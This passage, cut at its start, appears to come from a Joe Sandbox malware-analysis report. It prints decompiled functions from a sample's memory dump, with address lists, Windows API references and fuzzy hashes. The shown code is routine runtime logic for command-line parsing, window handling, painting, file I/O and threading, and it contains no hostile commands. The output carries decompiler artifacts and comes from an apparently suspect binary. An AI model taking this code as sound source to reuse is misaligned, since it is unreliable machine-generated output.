				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E0040500C(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                    0x00402a20
                                                    0x00402a22
                                                    0x00402a2e
                                                    0x00402a2e
                                                    0x00402a2e
                                                    0x00402a32
                                                    0x00402a2c
                                                    0x00402a2c
                                                    0x00402a2e
                                                    0x00402a2e
                                                    0x00402a32
                                                    0x00402a2c
                                                    0x00402a2c
                                                    0x00402a38
                                                    0x00402a3b
                                                    0x00402a48
                                                    0x00402a4a
                                                    0x00402a91
                                                    0x00402a91
                                                    0x00402a95
                                                    0x00000000
                                                    0x00000000
                                                    0x00402a50
                                                    0x00402a84
                                                    0x00402a8d
                                                    0x00402a8f
                                                    0x00000000
                                                    0x00402a8f
                                                    0x00402a58
                                                    0x00402a6a
                                                    0x00402a6a
                                                    0x00402a6e
                                                    0x00000000
                                                    0x00000000
                                                    0x00402a5d
                                                    0x00402a66
                                                    0x00402a68
                                                    0x00402a68
                                                    0x00402a77
                                                    0x00402a7f
                                                    0x00402a7f
                                                    0x00402a77
                                                    0x00402a9b
                                                    0x00402aa0
                                                    0x00402aa2
                                                    0x00402aa4
                                                    0x00402af9
                                                    0x00402af9
                                                    0x00402afd
                                                    0x00000000
                                                    0x00000000
                                                    0x00402aaa
                                                    0x00402ae5
                                                    0x00402aec
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402aee
                                                    0x00402aee
                                                    0x00402af0
                                                    0x00402af3
                                                    0x00402af4
                                                    0x00402af5
                                                    0x00000000
                                                    0x00402aee
                                                    0x00402ab2
                                                    0x00402acb
                                                    0x00402acb
                                                    0x00402acf
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ab7
                                                    0x00402abe
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ac0
                                                    0x00402ac0
                                                    0x00402ac2
                                                    0x00402ac5
                                                    0x00402ac6
                                                    0x00402ac7
                                                    0x00402ac0
                                                    0x00402ad8
                                                    0x00402ae0
                                                    0x00402ae0
                                                    0x00402ad8
                                                    0x00402b05
                                                    0x00402a43
                                                    0x00402a43
                                                    0x00000000
                                                    0x00402a43
                                                    0x00402a3b

                                                    APIs
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A53
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A5D
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A7A
                                                    • CharNextA.USER32(00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402A84
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AAD
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AB7
                                                    • CharNextA.USER32(00000000,00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402ADB
                                                    • CharNextA.USER32(00000000,00000000,?,?,00000000,?,00402B2C,00000000,00402B59,?,?,?,00000000), ref: 00402AE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CharNext
                                                    • String ID: "$"
                                                    • API String ID: 3213498283-3758156766
                                                    • Opcode ID: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction ID: 7f4eabc370d0c2b1a65279813ceea620399496a62879659d683f8910f88fef49
                                                    • Opcode Fuzzy Hash: f6c631b9bfbba0fccf281f579f268ce96caef945665294b9e62958ec9ed3533e
                                                    • Instruction Fuzzy Hash: 3621E5447443D21ADF7169B90EC83A76B894B5A31872804BB9582B63CBDCFC48479B6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00457244 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 144windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 72%
                                                    			E00457244(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v22;
				intOrPtr _v28;
				struct HWND__* _v32;
				char _v36;
				intOrPtr _t50;
				intOrPtr _t56;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t68;
				intOrPtr _t70;
				intOrPtr _t80;
				intOrPtr _t82;
				intOrPtr _t85;
				void* _t90;
				intOrPtr _t122;
				void* _t124;
				void* _t127;
				void* _t128;
				intOrPtr _t129;

				_t125 = __esi;
				_t124 = __edi;
				_t105 = __ebx;
				_t127 = _t128;
				_t129 = _t128 + 0xffffffe0;
				_push(__ebx);
				_push(__esi);
				_v36 = 0;
				_v8 = __eax;
				_push(_t127);
				_push(0x45750c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t129;
				E004397DC();
				if( *((char*)(_v8 + 0x57)) != 0 ||  *((intOrPtr*)( *_v8 + 0x50))() == 0 || ( *(_v8 + 0x2f4) & 0x00000008) != 0 ||  *((char*)(_v8 + 0x22f)) == 1) {
					_t50 =  *0x49da70; // 0x422f48
					E00406A70(_t50,  &_v36);
					E0040D144(_v36, 1);
					E00404378();
				}
				if(GetCapture() != 0) {
					SendMessageA(GetCapture(), 0x1f, 0, 0);
				}
				ReleaseCapture();
				_t56 =  *0x49ebb8; // 0x0
				E004596E4(_t56);
				_push(_t127);
				_push(0x4574ef);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				 *(_v8 + 0x2f4) =  *(_v8 + 0x2f4) | 0x00000008;
				_v32 = GetActiveWindow();
				_t60 =  *0x49be70; // 0x0
				_v20 = _t60;
				_t61 =  *0x49ebbc; // 0x0
				_t62 =  *0x49ebbc; // 0x0
				E0041ACE8( *((intOrPtr*)(_t62 + 0x7c)),  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t65 =  *0x49ebbc; // 0x0
				 *((intOrPtr*)(_t65 + 0x78)) = _v8;
				_t66 =  *0x49ebbc; // 0x0
				_v22 =  *((intOrPtr*)(_t66 + 0x44));
				_t68 =  *0x49ebbc; // 0x0
				E00458714(_t68,  *((intOrPtr*)(_t61 + 0x78)), 0);
				_t70 =  *0x49ebbc; // 0x0
				_v28 =  *((intOrPtr*)(_t70 + 0x48));
				_v16 = E00451600(0, _t105, _t124, _t125);
				_push(_t127);
				_push(0x4574cd);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				E00457194(_v8);
				_push(_t127);
				_push(0x45742c);
				_push( *[fs:edx]);
				 *[fs:edx] = _t129;
				SendMessageA(E00441704(_v8), 0xb000, 0, 0);
				 *((intOrPtr*)(_v8 + 0x24c)) = 0;
				do {
					_t80 =  *0x49ebb8; // 0x0
					E0045A580(_t80, _t124, _t125);
					_t82 =  *0x49ebb8; // 0x0
					if( *((char*)(_t82 + 0x9c)) == 0) {
						if( *((intOrPtr*)(_v8 + 0x24c)) != 0) {
							E004570F4(_v8);
						}
					} else {
						 *((intOrPtr*)(_v8 + 0x24c)) = 2;
					}
					_t85 =  *((intOrPtr*)(_v8 + 0x24c));
				} while (_t85 == 0);
				_v12 = _t85;
				SendMessageA(E00441704(_v8), 0xb001, 0, 0);
				_t90 = E00441704(_v8);
				if(_t90 != GetActiveWindow()) {
					_v32 = 0;
				}
				_pop(_t122);
				 *[fs:eax] = _t122;
				_push(0x457433);
				return E0045718C();
			}





























                                                    0x00457244
                                                    0x00457244
                                                    0x00457244
                                                    0x00457245
                                                    0x00457247
                                                    0x0045724a
                                                    0x0045724b
                                                    0x0045724e
                                                    0x00457251
                                                    0x00457256
                                                    0x00457257
                                                    0x0045725c
                                                    0x0045725f
                                                    0x00457262
                                                    0x0045726e
                                                    0x00457297
                                                    0x0045729c
                                                    0x004572ab
                                                    0x004572b0
                                                    0x004572b0
                                                    0x004572bc
                                                    0x004572ca
                                                    0x004572ca
                                                    0x004572cf
                                                    0x004572d4
                                                    0x004572d9
                                                    0x004572e0
                                                    0x004572e1
                                                    0x004572e6
                                                    0x004572e9
                                                    0x004572ef
                                                    0x004572fb
                                                    0x004572fe
                                                    0x00457303
                                                    0x00457306
                                                    0x0045730e
                                                    0x00457318
                                                    0x0045731d
                                                    0x00457325
                                                    0x00457328
                                                    0x00457331
                                                    0x00457337
                                                    0x0045733c
                                                    0x00457341
                                                    0x00457349
                                                    0x00457353
                                                    0x00457358
                                                    0x00457359
                                                    0x0045735e
                                                    0x00457361
                                                    0x00457367
                                                    0x0045736e
                                                    0x0045736f
                                                    0x00457374
                                                    0x00457377
                                                    0x0045738c
                                                    0x00457396
                                                    0x0045739c
                                                    0x0045739c
                                                    0x004573a1
                                                    0x004573a6
                                                    0x004573b2
                                                    0x004573cd
                                                    0x004573d2
                                                    0x004573d2
                                                    0x004573b4
                                                    0x004573b7
                                                    0x004573b7
                                                    0x004573da
                                                    0x004573e0
                                                    0x004573e4
                                                    0x004573f9
                                                    0x00457401
                                                    0x0045740f
                                                    0x00457413
                                                    0x00457413
                                                    0x00457418
                                                    0x0045741b
                                                    0x0045741e
                                                    0x0045742b

                                                    APIs
                                                    • GetCapture.USER32 ref: 004572B5
                                                    • GetCapture.USER32 ref: 004572C4
                                                    • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 004572CA
                                                    • ReleaseCapture.USER32(00000000,0045750C), ref: 004572CF
                                                    • GetActiveWindow.USER32 ref: 004572F6
                                                    • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 0045738C
                                                    • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 004573F9
                                                    • GetActiveWindow.USER32 ref: 00457408
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: CaptureMessageSend$ActiveWindow$Release
                                                    • String ID: H/B
                                                    • API String ID: 862346643-184950203
                                                    • Opcode ID: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction ID: 07b1c62a38d4c59f35ab2a161c95611ba83c65b292c9824363ed57e20a3288b5
                                                    • Opcode Fuzzy Hash: c132ccbc1d8843ba1326dfc613755e208ed03b4cb6e87a844a7b76971916ced5
                                                    • Instruction Fuzzy Hash: 19512E34A04244EFDB10EF6AD946F9A77F1EB49704F1580BAF800A73A2D778AD44DB49
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0043F510 Relevance: 15.2, APIs: 10, Instructions: 177windowCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E0043F510(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v80;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E0041AC6C( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E00424950(0xff000010));
							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E00424950(0xff000014));
							E00419804( *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E0041ACC8(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E0041AC6C( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00419804( *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								L004398B8(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								E0043C130(_t136, _t162, 0xf, 0);
								RestoreDC(_t162, _v80);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                                    0x0043f514
                                                    0x0043f517
                                                    0x0043f519
                                                    0x0043f51b
                                                    0x0043f524
                                                    0x0043f542
                                                    0x0043f542
                                                    0x0043f545
                                                    0x0043f54d
                                                    0x0043f632
                                                    0x0043f632
                                                    0x0043f63a
                                                    0x0043f73f
                                                    0x0043f73f
                                                    0x0043f73f
                                                    0x0043f643
                                                    0x0043f646
                                                    0x00000000
                                                    0x00000000
                                                    0x0043f64d
                                                    0x0043f651
                                                    0x0043f653
                                                    0x0043f65b
                                                    0x0043f660
                                                    0x0043f669
                                                    0x0043f6a3
                                                    0x0043f6c6
                                                    0x0043f6d1
                                                    0x0043f6db
                                                    0x0043f6f0
                                                    0x0043f713
                                                    0x0043f71e
                                                    0x0043f728
                                                    0x0043f728
                                                    0x0043f72d
                                                    0x0043f72e
                                                    0x0043f72e
                                                    0x0043f72e
                                                    0x00000000
                                                    0x0043f653
                                                    0x0043f553
                                                    0x0043f557
                                                    0x0043f560
                                                    0x0043f564
                                                    0x0043f566
                                                    0x0043f566
                                                    0x0043f564
                                                    0x0043f571
                                                    0x0043f577
                                                    0x0043f57d
                                                    0x0043f58a
                                                    0x0043f590
                                                    0x0043f5be
                                                    0x0043f5d0
                                                    0x0043f5d6
                                                    0x0043f5d8
                                                    0x0043f5d8
                                                    0x0043f5e4
                                                    0x0043f5f0
                                                    0x0043f602
                                                    0x0043f612
                                                    0x0043f61d
                                                    0x0043f622
                                                    0x0043f622
                                                    0x0043f5d0
                                                    0x0043f628
                                                    0x0043f629
                                                    0x0043f57d

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                                                    • String ID:
                                                    • API String ID: 375863564-0
                                                    • Opcode ID: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                    • Instruction ID: 085781c14da3806a19508914d9dc02b8af2cdac2da7d1e5622b20ea0d846e8a9
                                                    • Opcode Fuzzy Hash: 8535f061f58d91ec7875d8a93a00a35639cace3c28fd1a3b42cad5b16738879b
                                                    • Instruction Fuzzy Hash: CC516F71A04200ABD714EF69C8C5B5B77D8AF49308F04546AEE89CB397D738EC45CB59
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00402D70 Relevance: 15.1, APIs: 10, Instructions: 129fileCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 70%
                                                    			E00402D70(void** __eax) {
				long _t29;
				void* _t31;
				long _t34;
				void* _t38;
				void* _t40;
				long _t41;
				int _t44;
				void* _t46;
				long _t54;
				long _t55;
				void* _t58;
				void** _t59;
				DWORD* _t60;

				_t59 = __eax;
				 *((intOrPtr*)(__eax + 0xc)) = 0;
				 *((intOrPtr*)(__eax + 0x10)) = 0;
				if(0xffffffffffff284f == 0) {
					_t29 = 0x80000000;
					_t55 = 1;
					_t54 = 3;
					 *((intOrPtr*)(__eax + 0x1c)) = 0x402cc4;
				} else {
					if(0xffffffffffff284f == 0) {
						_t29 = 0x40000000;
						_t55 = 1;
						_t54 = 2;
					} else {
						if(0xffffffffffff284f != 0) {
							return 0xffffffffffff284d;
						}
						_t29 = 0xc0000000;
						_t55 = 1;
						_t54 = 3;
					}
					_t59[7] = E00402D04;
				}
				_t59[9] = E00402D50;
				_t59[8] = E00402D00;
				if(_t59[0x12] == 0) {
					_t59[2] = 0x80;
					_t59[9] = E00402D00;
					_t59[5] =  &(_t59[0x53]);
					if(_t59[1] == 0xd7b2) {
						if(_t59 != 0x49e3e8) {
							_push(0xfffffff5);
						} else {
							_push(0xfffffff4);
						}
					} else {
						_push(0xfffffff6);
					}
					_t31 = GetStdHandle();
					if(_t31 == 0xffffffff) {
						goto L37;
					}
					 *_t59 = _t31;
					goto L30;
				} else {
					_t38 = CreateFileA( &(_t59[0x12]), _t29, _t55, 0, _t54, 0x80, 0);
					if(_t38 == 0xffffffff) {
						L37:
						_t59[1] = 0xd7b0;
						return GetLastError();
					}
					 *_t59 = _t38;
					if(_t59[1] != 0xd7b3) {
						L30:
						if(_t59[1] == 0xd7b1) {
							L34:
							return 0;
						}
						_t34 = GetFileType( *_t59);
						if(_t34 == 0) {
							CloseHandle( *_t59);
							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402D04;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                    0x00402d71
                                                    0x00402d75
                                                    0x00402d78
                                                    0x00402d84
                                                    0x00402d91
                                                    0x00402d96
                                                    0x00402d9b
                                                    0x00402da0
                                                    0x00402d86
                                                    0x00402d87
                                                    0x00402da9
                                                    0x00402dae
                                                    0x00402db3
                                                    0x00402d89
                                                    0x00402d8a
                                                    0x00000000
                                                    0x00000000
                                                    0x00402dba
                                                    0x00402dbf
                                                    0x00402dc4
                                                    0x00402dc4
                                                    0x00402dc9
                                                    0x00402dc9
                                                    0x00402dd0
                                                    0x00402dd7
                                                    0x00402de2
                                                    0x00402ea0
                                                    0x00402ea7
                                                    0x00402eae
                                                    0x00402eb7
                                                    0x00402ec3
                                                    0x00402ec9
                                                    0x00402ec5
                                                    0x00402ec5
                                                    0x00402ec5
                                                    0x00402eb9
                                                    0x00402eb9
                                                    0x00402eb9
                                                    0x00402ecb
                                                    0x00402ed3
                                                    0x00000000
                                                    0x00000000
                                                    0x00402ed5
                                                    0x00000000
                                                    0x00402de8
                                                    0x00402df8
                                                    0x00402e00
                                                    0x00402f0e
                                                    0x00402f0e
                                                    0x00000000
                                                    0x00402f14
                                                    0x00402e06
                                                    0x00402e0e
                                                    0x00402ed7
                                                    0x00402edd
                                                    0x00402ef6
                                                    0x00000000
                                                    0x00402ef6
                                                    0x00402ee1
                                                    0x00402ee8
                                                    0x00402efc
                                                    0x00402f01
                                                    0x00000000
                                                    0x00402f07
                                                    0x00402eed
                                                    0x00402eef
                                                    0x00402eef
                                                    0x00000000
                                                    0x00402eed
                                                    0x00402e14
                                                    0x00402e21
                                                    0x00402e22
                                                    0x00000000
                                                    0x00000000
                                                    0x00402e28
                                                    0x00402e2d
                                                    0x00402e2f
                                                    0x00402e2f
                                                    0x00402e3e
                                                    0x00000000
                                                    0x00402e44
                                                    0x00402e59
                                                    0x00402e5e
                                                    0x00402e60
                                                    0x00000000
                                                    0x00000000
                                                    0x00402e66
                                                    0x00402e68
                                                    0x00402e74
                                                    0x00402e88
                                                    0x00000000
                                                    0x00402e98
                                                    0x00000000
                                                    0x00402e98
                                                    0x00402e88
                                                    0x00402e76
                                                    0x00402e76
                                                    0x00000000
                                                    0x00402e68
                                                    0x00402e3e

                                                    APIs
                                                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                    • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                    • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                    • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                    • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                    • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                    • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                    • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                    • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.329204353.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_400000_y8kdmHi6x3.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                    • String ID:
                                                    • API String ID: 1694776339-0
                                                    • Opcode ID: 7f15e19dec3a7b4c9707014ec2505ad9d397bf6e92e06e4bc8213e66d79b557f
                                                    • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                    • Opcode Fuzzy Hash: 7f15e19dec3a7b4c9707014ec2505ad9d397bf6e92e06e4bc8213e66d79b557f
                                                    • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004214B8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 109threadCOMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 67%
                                                    			E004214B8(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v5;
				intOrPtr* _v12;
				long _v16;
				char _v20;
				char _v24;
				long _t22;
				char _t29;
				void* _t53;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr _t63;
				intOrPtr _t66;
				intOrPtr _t67;
				void* _t72;
				void* _t73;
				intOrPtr _t74;

				_t72 = _t73;
				_t74 = _t73 + 0xffffffec;
				_push(__esi);
				_push(__edi);
				_t53 = __eax;
				_t22 = GetCurrentThreadId();
				_t62 =  *0x49de40; // 0x49e034
				if(_t22 !=  *_t62) {
					_v24 = GetCurrentThreadId();
					_v20 = 0;
					_t61 =  *0x49dbc8; // 0x41744c
					E0040D23C(_t53, _t61, 1, __edi, __esi, 0,  &_v24);
					E00404378();
				}
				if(_t53 <= 0) {
					E0042146C();
				} else {
					E00421478(_t53);
				}
				_v16 = 0;
				_push(0x49e86c);
				L00406FE0();
				_push(_t72);
				_push(0x421646);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				_v16 = InterlockedExchange( &E0049B5C4, _v16);
				_push(_t72);
				_push(0x421627);
				_push( *[fs:eax]);
				 *[fs:eax] = _t74;
				if(_v16 == 0 ||  *((intOrPtr*)(_v16 + 8)) <= 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				_v5 = _t29;
				if(_v5 == 0) {
					L14:
					_pop(_t63);
					 *[fs:eax] = _t63;
					_push(E0042162E);
					return L00403BEC(_v16);
				} else {
					if( *((intOrPtr*)(_v16 + 8)) > 0) {
						_v12 = E0041AC6C(_v16, 0);
						E0041AB5C(_v16, 0);
						L004071A0();
						 *[fs:eax] = _t74;
						 *[fs:eax] = _t74;
						 *((intOrPtr*)( *_v12 + 8))( *[fs:eax], _t72,  *[fs:eax], 0x4215f1, _t72, 0x49e86c);
						_pop(_t66);
						 *[fs:eax] = _t66;
						_t67 = 0x4215c2;
						 *[fs:eax] = _t67;
						_push(E004215F8);
						_push(0x49e86c);
						L00406FE0();
						return 0;
					} else {
						goto L14;
					}
				}
			}



















                                                    0x004214b9
                                                    0x004214bb
                                                    0x004214bf
                                                    0x004214c0
                                                    0x004214c1
                                                    0x004214c3
                                                    0x004214c8
                                                    0x004214d0
                                                    0x004214d7
                                                    0x004214da
                                                    0x004214e4
                                                    0x004214f1
                                                    0x004214f6
                                                    0x004214f6
                                                    0x004214fd
                                                    0x00421508
                                                    0x004214ff
                                                    0x00421501
                                                    0x00421501
                                                    0x0042150f
                                                    0x00421512
                                                    0x00421517
                                                    0x0042151e
                                                    0x0042151f
